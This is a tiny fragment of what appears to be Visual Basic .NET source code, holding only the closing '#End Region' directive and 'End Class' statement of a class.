#End Region


End Class
